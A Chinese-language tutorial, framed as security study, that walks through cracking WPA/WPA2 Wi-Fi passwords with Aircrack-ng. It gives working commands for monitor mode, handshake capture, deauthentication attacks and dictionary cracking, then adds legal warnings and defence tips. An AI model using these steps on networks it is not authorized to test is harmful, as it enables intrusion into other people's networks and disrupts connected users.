本文仅用于网络安全学习与防御研究,请勿用于非法攻击。未经授权访问他人网络是违法行为。
一、前言
作为网络安全研究者,了解常见的无线网络攻击手段是提升防御能力的重要途径。Aircrack-ng 是一套经典的无线网络审计工具集,常用于测试 WiFi 网络的安全性。本文将记录使用 Aircrack-ng 对WPA/WPA2 密码的基本流程与原理,供学习参考。
二、原理简述
现代无线网络普遍采用 WPA/WPA2 加密,其破解并非直接"解密",而是通过捕获握手包 并离线暴力破解实现:
-
无线网卡监听数据包
WiFi 设备连接路由器时会产生"握手包",其中包含加密后的密码信息。
-
抓取握手包
将无线网卡切换至监听模式,捕获目标 WiFi 的握手包。
-
离线字典攻击
使用字典文件对握手包进行暴力破解,尝试匹配密码。
三、环境与工具准备
-
系统:Kali Linux(内置 Aircrack-ng)
-
无线网卡:支持监听模式的外置网卡(如 RT3070、RTL8812AU)
-
字典文件:密码字典(如 rockyou.txt)
-
测试网络 :务必在授权环境中测试
四、实战步骤
步骤1:检查无线网卡
ip addr
确认网卡名称(如 wlan0)。
步骤2:开启监听模式
airmon-ng start wlan0
输出监听模式接口(如 wlan0mon)。
步骤3:扫描附近 WiFi
airodump-ng wlan0mon
记录目标 WiFi 的:
-
BSSID(MAC 地址)
-
信道(CH)
-
信号强度(建议 >-65dBm)
步骤4:抓取握手包
airodump-ng -c <信道> --bssid <BSSID> -w capture wlan0mon
等待右上角出现 "WPA handshake" 提示。
加速握手(可选)
若已有设备连接,可发送解除认证包强制重连:
aireplay-ng -0 2 -a <BSSID> -c <已连接设备MAC> wlan0mon
步骤5:使用字典
aircrack-ng -w password.txt capture-01.cap
成功则会显示:
KEY FOUND! [ 密码明文 ]
五、关键注意事项
-
法律与道德
-
仅测试自己拥有的网络
-
未经授权的攻击涉嫌违法
-
-
技术限制
-
弱密码才可能被字典破解
-
复杂密码需要极强算力或更大字典
-
-
防御建议
-
使用 12 位以上复杂密码(字母+数字+符号)
-
定期更换密码
-
启用 WPA3(若设备支持)
-
隐藏 SSID、启用 MAC 过滤
-
六、总结
Aircrack-ng 演示了离线字典攻击的基本流程,揭示了弱密码在无线网络中的风险。作为安全研究者,我们应从攻击视角理解漏洞,进而构建更安全的网络环境。
技术是一把双刃剑,请务必用于正途。